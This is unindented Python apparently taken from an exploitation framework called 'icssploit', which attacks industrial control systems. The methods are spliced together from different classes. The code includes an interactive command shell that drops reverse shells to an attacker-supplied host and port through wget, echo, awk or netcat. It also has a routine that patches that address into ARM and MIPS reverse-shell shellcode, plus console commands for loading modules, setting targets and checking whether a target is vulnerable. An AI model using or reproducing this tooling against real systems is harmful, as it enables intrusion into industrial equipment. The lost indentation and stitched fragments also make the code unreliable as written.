def shell(exploit, architecture="", method="", **params):
while 1:
while not printer_queue.empty():
pass
cmd = raw_input("cmd > ")
if cmd in ["quit", "exit"]:
return
c = cmd.split()
if len(c) and c[0] == "reverse_tcp":
if len(c) == 3:
lhost = c[1]
lport = c[2]
revshell = reverse_shell(exploit, architecture, lhost, lport)
if method == "wget":
revshell.wget(binary=params['binary'],
location=params['location'])
elif method == "echo":
revshell.echo(binary=params['binary'],
location=params['location'])
elif method == "awk":
revshell.awk(binary=params['binary'])
elif method == "netcat":
revshell.netcat(binary=params['binary'],
shell=params['shell'])
else:
print_error("Reverse shell is not available")
else:
print_error("reverse_tcp <reverse ip> <port>")
else:
print_info(exploit.execute(cmd))
def command_show(self, *args, **kwargs):
sub_command = args[0]
try:
getattr(self, "_show_{}".format(sub_command))(*args, **kwargs)
except AttributeError:
utils.print_error("Unknown 'show' sub-command '{}'. "
"What do you want to show?\n"
"Possible choices are: {}".format(sub_command, self.show_sub_commands))
def command_run(self, *args, **kwargs):
utils.print_status("Running module...")
try:
self.current_module.run()
except KeyboardInterrupt:
utils.print_info()
utils.print_error("Operation cancelled by user")
except:
utils.print_error(traceback.format_exc(sys.exc_info()))
def command_unsetg(self, *args, **kwargs):
key, _, value = args[0].partition(' ')
try:
del GLOBAL_OPTS[key]
except KeyError:
utils.print_error("You can't unset global option '{}'.\n"
"Available global options: {}".format(key, GLOBAL_OPTS.keys()))
else:
utils.print_success({key: value})
def command_use(self, module_path, *args, **kwargs):
if module_path.startswith("extra_"):
module_path = utils.pythonize_path(module_path)
else:
module_path = utils.pythonize_path(module_path)
module_path = '.'.join(('icssploit', 'modules', module_path))
try:
self.current_module = utils.import_exploit(module_path)()
except icssploitException as err:
utils.print_error(err.message)
def command_set(self, *args, **kwargs):
key, _, value = args[0].partition(' ')
if key in self.current_module.options:
setattr(self.current_module, key, value)
if kwargs.get("glob", False):
GLOBAL_OPTS[key] = value
utils.print_success({key: value})
else:
utils.print_error("You can't set option '{}'.\n"
"Available options: {}".format(key, self.current_module.options))
def command_check(self, *args, **kwargs):
try:
result = self.current_module.check()
except Exception as error:
utils.print_error(error)
else:
if result is True:
utils.print_success("Target is vulnerable")
elif result is False:
utils.print_error("Target is not vulnerable")
else:
utils.print_status("Target could not be verified")
def command_search(self, *args, **kwargs):
keyword = args[0]
if not keyword:
utils.print_error(
"Please specify search keyword. e.g. 'search plc'")
return
for module in self.modules:
if keyword.lower() in module.lower():
module = utils.humanize_path(module)
utils.print_info(
"{}\033[31m{}\033[0m{}".format(*module.partition(keyword)))
def generate_binary(self, lhost, lport):
print_status("Generating reverse shell binary")
self.binary_name = random_text(8)
ip = self.convert_ip(lhost)
port = self.convert_port(lport)
if self.arch == 'arm':
self.revshell = self.arm[:0x104] + ip + self.arm[
0x108:0x10a] + port + self.arm[0x10c:]
elif self.arch == 'mipsel':
self.revshell = self.mipsel[:0xe4] + port + self.mipsel[
0xe6:0xf0] + ip[2:] + self.mipsel[
0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:]
elif self.arch == 'mips':
self.revshell = self.mips[:0xea] + port + self.mips[
0xec:0xf2] + ip[:2] + self.mips[0xf4:0xf6] + ip[
2:] + self.mips[0xf8:]
else:
print_error("Platform not supported")
def start(self):
""" icssploit main entry point. Starting interpreter loop. """
utils.print_info(self.banner)
printer_queue.join()
while True:
try:
command, args = self.parse_line(raw_input(self.prompt))
if not command:
continue
command_handler = self.get_command_handler(command)
command_handler(args)
except icssploitException as err:
utils.print_error(err)
except EOFError:
utils.print_info()
utils.print_status("icssploit stopped")
break
except KeyboardInterrupt:
utils.print_info()
finally:
printer_queue.join()
